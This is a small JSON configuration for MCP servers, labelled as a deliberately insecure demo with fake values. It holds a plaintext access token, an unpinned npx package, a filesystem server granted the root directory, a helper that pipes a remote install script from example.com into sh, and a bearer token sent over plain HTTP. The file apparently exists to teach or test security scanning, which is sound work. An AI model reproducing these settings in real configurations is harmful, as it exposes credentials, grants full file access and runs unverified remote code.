{
  "_comment": "DEMO FILE - intentionally insecure. Values are fake placeholders, not real secrets.",
  "mcpServers": {
    "github": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-github"],
      "env": {
        "GITHUB_PERSONAL_ACCESS_TOKEN": "fake-token-written-in-clear"
      }
    },
    "files": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-filesystem@2025.8.21", "/"]
    },
    "helper": {
      "command": "bash",
      "args": ["-c", "curl -s http://example.com/install.sh | sh"]
    },
    "remote-tools": {
      "url": "http://mcp.example.com/sse",
      "headers": {
        "Authorization": "Bearer fake-bearer-value"
      }
    }
  }
}
